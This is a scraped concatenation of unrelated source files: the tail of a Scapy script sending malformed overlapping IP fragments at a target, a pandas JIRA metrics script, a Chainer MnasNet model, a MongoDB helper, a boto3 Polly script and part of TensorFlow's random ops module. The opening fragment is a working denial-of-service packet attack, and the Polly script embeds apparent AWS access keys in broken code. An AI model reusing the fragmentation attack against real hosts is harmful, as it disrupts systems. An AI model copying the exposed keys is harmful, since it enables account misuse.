size=1300
offset=80
load="A"*size
i=IP()
i.dst=target
i.proto=17
i.flags="MF"
i.frag=0
send(i/load)
print ("Attack 2 packet 0")
for x in range(1, 10):
i.frag=offset
offset=offset+80
send(i/load)
print ("Attack 2 packet " + str(x))
i.frag=offset
i.flags=0
send(i/load)
elif attack == '3':
print ("Using attack 3")
size=1336
offset=3
load1="\x00"*size
i=IP()
i.dst=target
i.flags="MF"
i.proto=17
size=4
offset=18
load2="\x00"*size
j=IP()
j.dst=target
j.flags=0
j.proto=17
j.frag=offset
send(i/load1)
send(j/load2)
else: # attack == 4
print ("Using attack 4")
size=1300
offset=10
load="A"*size
i=IP()
i.dst=target
i.flags="MF"
i.proto=17
j=IP()
j.dst=target
j.flags=0
j.proto=17
j.frag=offset
send(i/load)
send(j/load)
print ("Done!")
| [
"mahdad.baghani@outlook.com"
] | mahdad.baghani@outlook.com |
0fc5f71bac55473da4ac79d53c9b5be29ec82c56 | 59f5b98b59bb20fb42decd8ca483e41eae485342 | /Project Metrics Processing Script.py | 68938c55f708a93346ee203c11d88917c430feb0 | [] | no_license | ikhoche/python_projects | 95316833e237953c5d49c8cc066cd9a15e729f31 | 14052ac1119fb3f31502909118fd226288415994 | refs/heads/master | 2023-01-06T15:26:02.875409 | 2020-11-02T19:14:38 | 2020-11-02T19:14:38 | 296,965,510 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,018 | py | #!/usr/bin/env python
# coding: utf-8
# This script creates a table from using data from JIRA and calculates how many User Stories and Bugs were Created and Resolved per day per project.
import pandas as pd
df = pd.read_csv(r'C:\Users\ishan.khoche\Documents\Project Metrics\Projec Metrics Dashboard Data_23Oct- Copy.csv') #Load File to be analyzed
fixedversion = df.loc[df['Fixed Version'] == 'ZS Web 2.0Mallorca'] # Enter Fixed Version
bug = fixedversion.loc[fixedversion['Issue Type'] == 'Bug']
bug['created date'] = pd.to_datetime(bug['Created']).dt.date
bug['Created/Resolved'] = 'Created' #add column to mark that these are created bugs
createdBugs = bug.groupby(['created date', 'Fixed Version','Created/Resolved']).size() #Count of Created/Day
bug['resolved date'] = pd.to_datetime(bug['Resolved']).dt.date
bug['Created/Resolved'] = 'Resolved' #add column to mark that these are resolved bugs
resolvedBugs = bug.groupby(['resolved date', 'Fixed Version','Created/Resolved']).size() #Count of Resolved/Day
#Change name of file below:
createdBugs.append(resolvedBugs).to_csv('ZS Web 2.0Mallorca_bugs.csv') # Create file with bugs created/resolved counts
userstories = fixedversion.loc[fixedversion['Issue Type'] == 'Story']
userstories['created date'] = pd.to_datetime(userstories['Created']).dt.date
userstories['Created/Resolved'] = 'Created' #add column to mark that these are created bugs
createduserstories = userstories.groupby(['created date', 'Fixed Version','Created/Resolved']).size() #Count of Created/Day
userstories['resolved date'] = pd.to_datetime(userstories['Resolved']).dt.date
userstories['Created/Resolved'] = 'Resolved' #add column to mark that these are resolved bugs
resolveduserstories = userstories.groupby(['resolved date', 'Fixed Version','Created/Resolved']).size() #Count of Resolved/Day
#Change name of file below:
createduserstories.append(resolveduserstories).to_csv('ZS Web 2.0Mallorca_us.csv') # Create file with bugs created/resolved counts
| [
"71572354+ikhoche@users.noreply.github.com"
] | 71572354+ikhoche@users.noreply.github.com |
c70f0f21ddbab3ceb6ab8740dc0a3da2d1b05679 | 8e52c27f1b2823db67db4438b2b7e22c18254eca | /chainer_/chainercv2/models/mnasnet.py | 7fc29a525f9eef9ba2765ae2e02a792b0197b0e0 | [
"MIT"
] | permissive | earhian/imgclsmob | 5582f5f2d4062b620eecc28d5c4c9245fea47291 | c87c0942420876941868c016211073dec4392e4d | refs/heads/master | 2020-04-12T02:13:55.258601 | 2018-12-17T20:38:19 | 2018-12-17T20:38:19 | 162,242,486 | 1 | 0 | MIT | 2018-12-18T06:40:42 | 2018-12-18T06:40:41 | null | UTF-8 | Python | false | false | 13,344 | py | """
MnasNet, implemented in Chainer.
Original paper: 'MnasNet: Platform-Aware Neural Architecture Search for Mobile,' https://arxiv.org/abs/1807.11626.
"""
__all__ = ['MnasNet', 'mnasnet']
import os
import chainer.functions as F
import chainer.links as L
from chainer import Chain
from functools import partial
from chainer.serializers import load_npz
from .common import SimpleSequential
class ConvBlock(Chain):
"""
Standard convolution block with Batch normalization and ReLU activation.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
ksize : int or tuple/list of 2 int
Convolution window size.
stride : int or tuple/list of 2 int
Stride of the convolution.
pad : int or tuple/list of 2 int
Padding value for convolution layer.
groups : int, default 1
Number of groups.
activate : bool, default True
Whether activate the convolution block.
"""
def __init__(self,
in_channels,
out_channels,
ksize,
stride,
pad,
groups=1,
activate=True):
super(ConvBlock, self).__init__()
self.activate = activate
with self.init_scope():
self.conv = L.Convolution2D(
in_channels=in_channels,
out_channels=out_channels,
ksize=ksize,
stride=stride,
pad=pad,
nobias=True,
groups=groups)
self.bn = L.BatchNormalization(
size=out_channels,
eps=1e-5)
if self.activate:
self.activ = F.relu
def __call__(self, x):
x = self.conv(x)
x = self.bn(x)
if self.activate:
x = self.activ(x)
return x
def conv1x1_block(in_channels,
out_channels,
activate=True):
"""
1x1 version of the standard convolution block.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
activate : bool, default True
Whether activate the convolution block.
"""
return ConvBlock(
in_channels=in_channels,
out_channels=out_channels,
ksize=1,
stride=1,
pad=0,
groups=1,
activate=activate)
def dwconv_block(in_channels,
out_channels,
ksize,
stride,
activate=True):
"""
Depthwise version of the standard convolution block.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
ksize : int or tuple/list of 2 int
Convolution window size.
stride : int or tuple/list of 2 int
Stride of the convolution.
activate : bool, default True
Whether activate the convolution block.
"""
return ConvBlock(
in_channels=in_channels,
out_channels=out_channels,
ksize=ksize,
stride=stride,
pad=(ksize // 2),
groups=out_channels,
activate=activate)
class DwsConvBlock(Chain):
"""
Depthwise separable convolution block with BatchNorms and activations at each convolution layers.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
"""
def __init__(self,
in_channels,
out_channels):
super(DwsConvBlock, self).__init__()
with self.init_scope():
self.dw_conv = dwconv_block(
in_channels=in_channels,
out_channels=in_channels,
ksize=3,
stride=1)
self.pw_conv = conv1x1_block(
in_channels=in_channels,
out_channels=out_channels)
def __call__(self, x):
x = self.dw_conv(x)
x = self.pw_conv(x)
return x
class MnasUnit(Chain):
"""
MnasNet unit.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
ksize : int or tuple/list of 2 int
Convolution window size.
stride : int or tuple/list of 2 int
Stride of the second convolution layer.
expansion_factor : int
Factor for expansion of channels.
"""
def __init__(self,
in_channels,
out_channels,
ksize,
stride,
expansion_factor):
super(MnasUnit, self).__init__()
self.residual = (in_channels == out_channels) and (stride == 1)
mid_channels = in_channels * expansion_factor
with self.init_scope():
self.conv1 = conv1x1_block(
in_channels=in_channels,
out_channels=mid_channels,
activate=True)
self.conv2 = dwconv_block(
in_channels=mid_channels,
out_channels=mid_channels,
ksize=ksize,
stride=stride,
activate=True)
self.conv3 = conv1x1_block(
in_channels=mid_channels,
out_channels=out_channels,
activate=False)
def __call__(self, x):
if self.residual:
identity = x
x = self.conv1(x)
x = self.conv2(x)
x = self.conv3(x)
if self.residual:
x = x + identity
return x
class MnasInitBlock(Chain):
"""
MnasNet specific initial block.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels_list : list of 2 int
Numbers of output channels.
"""
def __init__(self,
in_channels,
out_channels_list):
super(MnasInitBlock, self).__init__()
with self.init_scope():
self.conv1 = ConvBlock(
in_channels=in_channels,
out_channels=out_channels_list[0],
ksize=3,
stride=2,
pad=1,
groups=1,
activate=True)
self.conv2 = DwsConvBlock(
in_channels=out_channels_list[0],
out_channels=out_channels_list[1])
def __call__(self, x):
x = self.conv1(x)
x = self.conv2(x)
return x
class MnasNet(Chain):
"""
MnasNet model from 'MnasNet: Platform-Aware Neural Architecture Search for Mobile,'
https://arxiv.org/abs/1807.11626.
Parameters:
----------
channels : list of list of int
Number of output channels for each unit.
init_block_channels : list of 2 int
Numbers of output channels for the initial unit.
final_block_channels : int
Number of output channels for the final block of the feature extractor.
ksizes : list of list of int
Number of kernel sizes for each unit.
expansion_factors : list of list of int
Number of expansion factors for each unit.
in_channels : int, default 3
Number of input channels.
in_size : tuple of two ints, default (224, 224)
Spatial size of the expected input image.
classes : int, default 1000
Number of classification classes.
"""
def __init__(self,
channels,
init_block_channels,
final_block_channels,
ksizes,
expansion_factors,
in_channels=3,
in_size=(224, 224),
classes=1000):
super(MnasNet, self).__init__()
self.in_size = in_size
self.classes = classes
with self.init_scope():
self.features = SimpleSequential()
with self.features.init_scope():
setattr(self.features, "init_block", MnasInitBlock(
in_channels=in_channels,
out_channels_list=init_block_channels))
in_channels = init_block_channels[-1]
for i, channels_per_stage in enumerate(channels):
ksizes_per_stage = ksizes[i]
expansion_factors_per_stage = expansion_factors[i]
stage = SimpleSequential()
with stage.init_scope():
for j, out_channels in enumerate(channels_per_stage):
ksize = ksizes_per_stage[j]
expansion_factor = expansion_factors_per_stage[j]
stride = 2 if (j == 0) else 1
setattr(stage, "unit{}".format(j + 1), MnasUnit(
in_channels=in_channels,
out_channels=out_channels,
ksize=ksize,
stride=stride,
expansion_factor=expansion_factor))
in_channels = out_channels
setattr(self.features, "stage{}".format(i + 1), stage)
setattr(self.features, 'final_block', conv1x1_block(
in_channels=in_channels,
out_channels=final_block_channels,
activate=True))
in_channels = final_block_channels
setattr(self.features, 'final_pool', partial(
F.average_pooling_2d,
ksize=7,
stride=1))
self.output = SimpleSequential()
with self.output.init_scope():
setattr(self.output, 'flatten', partial(
F.reshape,
shape=(-1, in_channels)))
setattr(self.output, 'fc', L.Linear(
in_size=in_channels,
out_size=classes))
def __call__(self, x):
x = self.features(x)
x = self.output(x)
return x
def get_mnasnet(model_name=None,
pretrained=False,
root=os.path.join('~', '.chainer', 'models'),
**kwargs):
"""
Create MnasNet model with specific parameters.
Parameters:
----------
model_name : str or None, default None
Model name for loading pretrained model.
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.chainer/models'
Location for keeping the model parameters.
"""
init_block_channels = [32, 16]
final_block_channels = 1280
layers = [3, 3, 3, 2, 4, 1]
downsample = [1, 1, 1, 0, 1, 0]
channels_per_layers = [24, 40, 80, 96, 192, 320]
expansion_factors_per_layers = [3, 3, 6, 6, 6, 6]
ksizes_per_layers = [3, 5, 5, 3, 5, 3]
default_kernel_size = 3
from functools import reduce
channels = reduce(lambda x, y: x + [[y[0]] * y[1]] if y[2] != 0 else x[:-1] + [x[-1] + [y[0]] * y[1]],
zip(channels_per_layers, layers, downsample), [])
ksizes = reduce(lambda x, y: x + [[y[0]] + [default_kernel_size] * (y[1] - 1)] if y[2] != 0 else x[:-1] + [
x[-1] + [y[0]] + [default_kernel_size] * (y[1] - 1)], zip(ksizes_per_layers, layers, downsample), [])
expansion_factors = reduce(lambda x, y: x + [[y[0]] * y[1]] if y[2] != 0 else x[:-1] + [x[-1] + [y[0]] * y[1]],
zip(expansion_factors_per_layers, layers, downsample), [])
net = MnasNet(
channels=channels,
init_block_channels=init_block_channels,
final_block_channels=final_block_channels,
ksizes=ksizes,
expansion_factors=expansion_factors,
**kwargs)
if pretrained:
if (model_name is None) or (not model_name):
raise ValueError("Parameter `model_name` should be properly initialized for loading pretrained model.")
from .model_store import get_model_file
load_npz(
file=get_model_file(
model_name=model_name,
local_model_store_dir_path=root),
obj=net)
return net
def mnasnet(**kwargs):
"""
MnasNet model from 'MnasNet: Platform-Aware Neural Architecture Search for Mobile,'
https://arxiv.org/abs/1807.11626.
Parameters:
----------
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.chainer/models'
Location for keeping the model parameters.
"""
return get_mnasnet(model_name="mnasnet", **kwargs)
def _test():
import numpy as np
import chainer
chainer.global_config.train = False
pretrained = False
models = [
mnasnet,
]
for model in models:
net = model(pretrained=pretrained)
weight_count = net.count_params()
print("m={}, {}".format(model.__name__, weight_count))
assert (model != mnasnet or weight_count == 4308816)
x = np.zeros((1, 3, 224, 224), np.float32)
y = net(x)
assert (y.shape == (1, 1000))
if __name__ == "__main__":
_test()
| [
"osemery@gmail.com"
] | osemery@gmail.com |
486f6508072f88d8dd80018dc3c1ea5bfc69e04c | 8333a1c076d723b3cda7efd2eb9d3ac8b83b59da | /flask_code/db_functions.py | 7e1e82588f2630757083912c58e0b171e95c1950 | [] | no_license | ykrasnikov/Crypto_vs_Market | c6dfe9fa22980feae9fbd2647705eb3766dbc119 | 65926ec173843a44dc8ef73705338e92dd3c0e5b | refs/heads/main | 2023-05-31T11:48:38.551658 | 2021-07-04T18:34:53 | 2021-07-04T18:34:53 | 349,805,791 | 1 | 0 | null | 2021-03-20T18:31:12 | 2021-03-20T18:31:12 | null | UTF-8 | Python | false | false | 1,125 | py | #####################################################################
################### Import libraries
#####################################################################
import datetime as dt
# database querry
from pymongo import MongoClient
from bson.json_util import dumps
import dns.resolver
#from bson.json_util import dumps
from secrets import password
from secrets import user
#####################################################################
################### Database Connection
#####################################################################
def db_search(date,currency):
print("DB_serach input",date,currency)
# Initialize PyMongo to work with MongoDBs
conn = f'mongodb+srv://{user}:{password}@cluster0.yicgz.mongodb.net/Crypto_vs_Market?retryWrites=true&w=majority'
client = MongoClient(conn)
#Define database and collection
db=client.Crypto_vs_Market
collection=db.crypto_history
record=collection.find()
print('db_search ', list(record))
request_json=json.dumps(list(record))
#request_json={"l":"990"}
client.close()
return request_json | [
"ykrasnikov@gmail.com"
] | ykrasnikov@gmail.com |
acdf4478b5546f9e5507cf046848c3422ddbdce4 | c73a435be9bed95cd770eb28f5cd671b75d23d2e | /tts_polly.py | 0651e64ba4ce7754ba2f7f23a661de6ee5cae79f | [] | no_license | Lim-Wee-Meng/python | 1cc2434f0a45b8642440cb09ff5438b9a0229cb3 | e84de5b149a000c4f01ccfda0c02ab61ac0de9eb | refs/heads/main | 2023-05-02T19:52:37.416810 | 2021-05-30T08:29:23 | 2021-05-30T08:29:23 | 371,625,148 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 496 | py | import boto3
polly_client = boto3.Session(
aws_access_key_id=AKIAWDNZVY5V7JVCY7N6,
aws_secret_access_key=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,
region_name='ap-southeast-1').client('Remy_TTS')
response = polly_client.synthesize_speech(VoiceId='Joanna',
OutputFormat='mp3',
Text = 'This is a sample text to be synthesized.')
file = open('speech.mp3', 'wb')
file.write(response['AudioStream'].read())
file.close()
| [
"noreply@github.com"
] | Lim-Wee-Meng.noreply@github.com |
b302b13d664f632886e2fab3aed08f727a416d21 | 81e706b69c789aff05691c41fa79156942927f82 | /site-packages/tensorflow/python/ops/stateful_random_ops.py | d27c20ca03006d7837c891f41ea4f308918b8e56 | [] | no_license | yoncho/OpenCV-code | f5a1091ef32f3c8c3254ab93e083950b84c4fabd | bda2f793b11462e67c7ab644b342beffb871e3de | refs/heads/master | 2023-03-30T12:01:23.521511 | 2021-04-01T13:45:44 | 2021-04-01T13:45:44 | 291,398,453 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 25,862 | py | # Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Operations for generating random numbers."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import numpy as np
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_stateful_random_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variables
from tensorflow.python.training.tracking import tracking
from tensorflow.python.util.tf_export import tf_export
# A seed for random ops (stateful and stateless) will always be 1024
# bits, all of which will be sent to the C++ code. The actual C++
# implementation of some algorithms may only use a lower part of the bits.
MAX_INT64 = 2**63 - 1
MIN_INT64 = -(2**63)
UINT64_SPAN = 2**64
# 'Variable' doesn't support uint32 or uint64 yet (due to reasons explained in
# b/111604096 and cl/171681867), so I use signed int here. I choose int64
# instead of int32 here because `VarHandleOp` doesn't support int32 on GPU.
SEED_TYPE = "int64"
SEED_MIN = MIN_INT64
SEED_MAX = MAX_INT64
SEED_UINT_SPAN = UINT64_SPAN
SEED_TYPE_BITS = 64
SEED_BIT_MASK = 0xFFFFFFFFFFFFFFFF
SEED_SIZE = 16 # in units of SEED_TYPE
STATE_TYPE = SEED_TYPE
ALGORITHM_TYPE = STATE_TYPE
RNG_ALG_PHILOX = 1
RNG_ALG_THREEFRY = 2
DEFAULT_ALGORITHM = RNG_ALG_PHILOX
PHILOX_STATE_SIZE = 3
THREEFRY_STATE_SIZE = 2
def non_deterministic_ints(shape, dtype=dtypes.int64):
"""Non-deterministically generates some integers.
This op may use some OS-provided source of non-determinism (e.g. an RNG), so
each execution will give different results.
Args:
shape: the shape of the result.
dtype: (optional) the dtype of the result.
Returns:
a tensor whose element values are non-deterministically chosen.
"""
return gen_stateful_random_ops.non_deterministic_ints(
shape=shape, dtype=dtype)
def _uint_to_int(n):
if n > SEED_MAX:
n = n - SEED_UINT_SPAN
return n
def _make_1d_state(state_size, seed):
"""Makes a 1-D RNG state.
Args:
state_size: an integer.
seed: an integer or 1-D tensor.
Returns:
a 1-D tensor of shape [state_size] and dtype STATE_TYPE.
"""
int_types = (int,) if sys.version_info >= (3, 0) else (int, long)
if isinstance(seed, int_types):
# chop the Python integer (infinite precision) into chunks of SEED_TYPE
ls = []
for _ in range(state_size):
ls.append(seed & SEED_BIT_MASK)
seed >>= SEED_TYPE_BITS
seed = ls
# to avoid overflow error from np.asarray
seed = list(map(_uint_to_int, seed))
seed = np.asarray(seed, dtype=STATE_TYPE)
if len(seed.shape) != 1:
raise ValueError(
"seed should only have one dimension; got shape: %s" % seed.shape)
seed = seed[0:state_size]
# Padding with zeros on the *left* if too short. Padding on the right would
# cause a small seed to be used as the "counter" while the "key" is always
# zero (for counter-based RNG algorithms), because in the current memory
# layout counter is stored before key. In such a situation two RNGs with
# two different small seeds may generate overlapping outputs.
seed_size = seed.shape[0]
if seed_size < state_size:
seed = np.pad(
seed, [(state_size - seed_size, 0)],
mode="constant",
constant_values=0)
assert seed.shape == (state_size,), "Wrong seed.shape: %s" % seed.shape
return seed
def _get_state_size(alg):
if alg == RNG_ALG_PHILOX:
return PHILOX_STATE_SIZE
elif alg == RNG_ALG_THREEFRY:
return THREEFRY_STATE_SIZE
else:
raise ValueError("Unsupported algorithm id: %s" % alg)
def _make_state_from_seed(seed, alg):
return _make_1d_state(_get_state_size(alg), seed)
@tf_export("random.experimental.create_rng_state")
def create_rng_state(seed, algorithm):
"""Creates a RNG state.
Args:
seed: an integer or 1-D tensor.
algorithm: an integer representing the RNG algorithm.
Returns:
a 1-D tensor whose size depends on the algorithm.
"""
return _make_state_from_seed(seed, algorithm)
def _shape_tensor(shape):
"""Convert to an int32 or int64 tensor, defaulting to int64 if empty."""
if isinstance(shape, (tuple, list)) and not shape:
dtype = dtypes.int64
else:
dtype = None
return ops.convert_to_tensor(shape, dtype=dtype, name="shape")
def _convert_to_state_tensor(t):
if isinstance(t, list):
# to avoid out-of-range error from ops.convert_to_tensor
t = list(map(_uint_to_int, t))
return ops.convert_to_tensor(t, dtype=STATE_TYPE)
@tf_export("random.experimental.Generator")
class Generator(tracking.AutoTrackable):
"""Random-number generator.
It uses Variable to manage its internal state, and allows choosing an
Random-Number-Generation (RNG) algorithm.
CPU, GPU and TPU with the same algorithm and seed will generate the same
integer random numbers. Float-point results (such as the output of `normal`)
may have small numerical discrepancies between CPU and GPU.
"""
def __init__(self, copy_from=None, state=None, alg=None):
"""Creates a generator.
The new generator will be initialized by one of the following ways, with
decreasing precedence:
(1) If `copy_from` is not None, the new generator is initialized by copying
information from another generator.
(3) If `state` and `alg` are not None (they must be set together), the new
generator is initialized by a state.
Args:
copy_from: a generator to be copied from.
state: a vector of dtype STATE_TYPE representing the initial state of the
RNG, whose length and semantics are algorithm-specific.
alg: the RNG algorithm. Possible values are RNG_ALG_PHILOX for the
Philox algorithm and RNG_ALG_THREEFRY for the ThreeFry
algorithm (see paper 'Parallel Random Numbers: As Easy as 1, 2, 3'
[https://www.thesalmons.org/john/random123/papers/random123sc11.pdf]).
"""
if copy_from is not None:
# All other arguments should be None
assert (alg or state) is None
self._state_var = variables.Variable(copy_from.state, dtype=STATE_TYPE,
trainable=False)
self._alg_var = copy_from.algorithm
else:
assert alg is not None and state is not None
state = _convert_to_state_tensor(state)
state.shape.assert_is_compatible_with([_get_state_size(alg)])
self._state_var = variables.Variable(state, dtype=STATE_TYPE,
trainable=False)
self._alg_var = alg
@classmethod
def from_state(cls, state, alg):
"""Creates a generator from a state.
See `__init__` for description of `state` and `alg`.
Args:
state: the new state.
alg: the RNG algorithm.
Returns:
The new generator.
"""
return cls(alg=alg, state=state)
@classmethod
def from_seed(cls, seed, alg=None):
"""Creates a generator from a seed.
A seed is a 1024-bit unsigned integer represented either as a Python
integer or a vector of integers. Seeds shorter than 1024-bit will be
padded. The padding, the internal structure of a seed and the way a seed
is converted to a state are all opaque (unspecified). The only semantics
specification of seeds is that two different seeds are likely to produce
two independent generators (but no guarantee).
Args:
seed: the seed for the RNG.
alg: (optional) the RNG algorithm. If None, it will be auto-selected. See
`__init__` for its possible values.
Returns:
The new generator.
"""
if alg is None:
# TODO(wangpeng): more sophisticated algorithm selection
alg = DEFAULT_ALGORITHM
state = create_rng_state(seed, alg)
return cls(state=state, alg=alg)
@classmethod
def from_non_deterministic_state(cls, alg=None):
"""Creates a generator by non-deterministically initializing its state.
The source of the non-determinism will be platform- and time-dependent.
Args:
alg: (optional) the RNG algorithm. If None, it will be auto-selected. See
`__init__` for its possible values.
Returns:
The new generator.
"""
if alg is None:
# TODO(wangpeng): more sophisticated algorithm selection
alg = DEFAULT_ALGORITHM
state = non_deterministic_ints(shape=[_get_state_size(alg)],
dtype=SEED_TYPE)
return cls(state=state, alg=alg)
@classmethod
def from_key_counter(cls, key, counter, alg):
"""Creates a generator from a key and a counter.
This constructor only applies if the algorithm is a counter-based algorithm.
See method `key` for the meaning of "key" and "counter".
Args:
key: the key for the RNG, a scalar of type STATE_TYPE.
counter: a vector of dtype STATE_TYPE representing the initial counter for
the RNG, whose length is algorithm-specific.,
alg: the RNG algorithm. If None, it will be auto-selected. See
`__init__` for its possible values.
Returns:
The new generator.
"""
counter = _convert_to_state_tensor(counter)
key = _convert_to_state_tensor(key)
counter.shape.assert_is_compatible_with([_get_state_size(alg) - 1])
key.shape.assert_is_compatible_with([])
key = array_ops.reshape(key, [1])
state = array_ops.concat([counter, key], 0)
return cls(state=state, alg=alg)
def reset(self, state):
"""Resets the generator by a new state.
See `__init__` for the meaning of "state".
Args:
state: the new state.
"""
state = _convert_to_state_tensor(state)
state.shape.assert_is_compatible_with([_get_state_size(self.algorithm)])
self._state_var.assign(state)
def reset_from_seed(self, seed):
"""Resets the generator by a new seed.
See `from_seed` for the meaning of "seed".
Args:
seed: the new seed.
"""
state = create_rng_state(seed, self.algorithm)
self._state_var.assign(state)
def reset_from_key_counter(self, key, counter):
"""Resets the generator by a new key-counter pair.
See `from_key_counter` for the meaning of "key" and "counter".
Args:
key: the new key.
counter: the new counter.
"""
counter = _convert_to_state_tensor(counter)
key = _convert_to_state_tensor(key)
counter.shape.assert_is_compatible_with(
[_get_state_size(self.algorithm) - 1])
key.shape.assert_is_compatible_with([])
key = array_ops.reshape(key, [1])
state = array_ops.concat([counter, key], 0)
self._state_var.assign(state)
@property
def state(self):
"""The internal state of the RNG."""
return self._state_var
@property
def algorithm(self):
"""The RNG algorithm."""
return self._alg_var
def _standard_normal(self, shape, dtype):
return gen_stateful_random_ops.stateful_standard_normal_v2(
self.state.handle, self.algorithm, shape, dtype=dtype)
@property
def key(self):
"""The 'key' part of the state of a counter-based RNG.
For a counter-base RNG algorithm such as Philox and ThreeFry (as
described in paper 'Parallel Random Numbers: As Easy as 1, 2, 3'
[https://www.thesalmons.org/john/random123/papers/random123sc11.pdf]),
the RNG state consists of two parts: counter and key. The output is
generated via the formula: output=hash(key, counter), i.e. a hashing of
the counter parametrized by the key. Two RNGs with two different keys can
be thought as generating two independent random-number streams (a stream
is formed by increasing the counter).
Returns:
A scalar which is the 'key' part of the state, if the RNG algorithm is
counter-based; otherwise it raises a ValueError.
"""
alg = self.algorithm
if alg == RNG_ALG_PHILOX or alg == RNG_ALG_THREEFRY:
return self._state_var[-1]
else:
raise ValueError("Unsupported algorithm id: %s" % alg)
def skip(self, delta):
"""Advance the counter of a counter-based RNG.
Args:
delta: the amount of advancement. The state of the RNG after
`skip(n)` will be the same as that after `normal([n])`
(or any other distribution). The actual increment added to the
counter is an unspecified implementation detail.
"""
gen_stateful_random_ops.rng_skip(self.state.handle, self.algorithm, delta)
# The following functions return a tensor and as a side effect update
# self._state_var.
def normal(self, shape, mean=0.0, stddev=1.0, dtype=dtypes.float32,
name=None):
"""Outputs random values from a normal distribution.
Args:
shape: A 1-D integer Tensor or Python array. The shape of the output
tensor.
mean: A 0-D Tensor or Python value of type `dtype`. The mean of the normal
distribution.
stddev: A 0-D Tensor or Python value of type `dtype`. The standard
deviation of the normal distribution.
dtype: The type of the output.
name: A name for the operation (optional).
Returns:
A tensor of the specified shape filled with random normal values.
"""
with ops.name_scope(name, "stateful_normal", [shape, mean, stddev]) as name:
shape = _shape_tensor(shape)
mean = ops.convert_to_tensor(mean, dtype=dtype, name="mean")
stddev = ops.convert_to_tensor(stddev, dtype=dtype, name="stddev")
rnd = self._standard_normal(shape, dtype=dtype)
return math_ops.add(rnd * stddev, mean, name=name)
def _truncated_normal(self, shape, dtype):
return gen_stateful_random_ops.stateful_truncated_normal(
self.state.handle, self.algorithm, shape, dtype=dtype)
def truncated_normal(self, shape,
mean=0.0,
stddev=1.0,
dtype=dtypes.float32,
name=None):
"""Outputs random values from a truncated normal distribution.
The generated values follow a normal distribution with specified mean and
standard deviation, except that values whose magnitude is more than
2 standard deviations from the mean are dropped and re-picked.
Args:
shape: A 1-D integer Tensor or Python array. The shape of the output
tensor.
mean: A 0-D Tensor or Python value of type `dtype`. The mean of the
truncated normal distribution.
stddev: A 0-D Tensor or Python value of type `dtype`. The standard
deviation of the normal distribution, before truncation.
dtype: The type of the output.
name: A name for the operation (optional).
Returns:
A tensor of the specified shape filled with random truncated normal
values.
"""
with ops.name_scope(
name, "truncated_normal", [shape, mean, stddev]) as name:
shape_tensor = _shape_tensor(shape)
mean_tensor = ops.convert_to_tensor(mean, dtype=dtype, name="mean")
stddev_tensor = ops.convert_to_tensor(stddev, dtype=dtype, name="stddev")
rnd = self._truncated_normal(shape_tensor, dtype=dtype)
mul = rnd * stddev_tensor
return math_ops.add(mul, mean_tensor, name=name)
def _uniform(self, shape, dtype):
return gen_stateful_random_ops.stateful_uniform(
self.state.handle, self.algorithm, shape=shape, dtype=dtype)
def uniform(self, shape, minval=0, maxval=None,
dtype=dtypes.float32, name=None):
"""Outputs random values from a uniform distribution.
The generated values follow a uniform distribution in the range
`[minval, maxval)`. The lower bound `minval` is included in the range, while
the upper bound `maxval` is excluded. (For float numbers especially
low-precision types like bfloat16, because of
rounding, the result may sometimes include `maxval`.)
For floats, the default range is `[0, 1)`. For ints, at least `maxval` must
be specified explicitly.
In the integer case, the random integers are slightly biased unless
`maxval - minval` is an exact power of two. The bias is small for values of
`maxval - minval` significantly smaller than the range of the output (either
`2**32` or `2**64`).
Args:
shape: A 1-D integer Tensor or Python array. The shape of the output
tensor.
minval: A 0-D Tensor or Python value of type `dtype`. The lower bound on
the range of random values to generate. Defaults to 0.
maxval: A 0-D Tensor or Python value of type `dtype`. The upper bound on
the range of random values to generate. Defaults to 1 if `dtype` is
floating point.
dtype: The type of the output.
name: A name for the operation (optional).
Returns:
A tensor of the specified shape filled with random uniform values.
Raises:
ValueError: If `dtype` is integral and `maxval` is not specified.
"""
dtype = dtypes.as_dtype(dtype)
if maxval is None:
if dtype.is_integer:
raise ValueError("Must specify maxval for integer dtype %r" % dtype)
maxval = 1
with ops.name_scope(name, "stateful_uniform",
[shape, minval, maxval]) as name:
shape = _shape_tensor(shape)
minval = ops.convert_to_tensor(minval, dtype=dtype, name="min")
maxval = ops.convert_to_tensor(maxval, dtype=dtype, name="max")
if dtype.is_integer:
return gen_stateful_random_ops.stateful_uniform_int(
self.state.handle, self.algorithm, shape=shape,
minval=minval, maxval=maxval, name=name)
else:
rnd = self._uniform(shape=shape, dtype=dtype)
return math_ops.add(rnd * (maxval - minval), minval, name=name)
def uniform_full_int(self, shape, dtype=dtypes.uint64, name=None):
"""Uniform distribution on an integer type's entire range.
The other method `uniform` only covers the range [minval, maxval), which
cannot be `dtype`'s full range because `maxval` is of type `dtype`.
Args:
shape: the shape of the output.
dtype: (optional) the integer type, default to uint64.
name: (optional) the name of the node.
Returns:
A tensor of random numbers of the required shape.
"""
dtype = dtypes.as_dtype(dtype)
with ops.name_scope(name, "stateful_uniform_full_int",
[shape]) as name:
shape = _shape_tensor(shape)
return gen_stateful_random_ops.stateful_uniform_full_int(
self.state.handle, self.algorithm, shape=shape,
dtype=dtype, name=name)
def binomial(self, shape, counts, probs, dtype=dtypes.int32, name=None):
"""Outputs random values from a binomial distribution.
The generated values follow a binomial distribution with specified count and
probability of success parameters.
Example:
```python
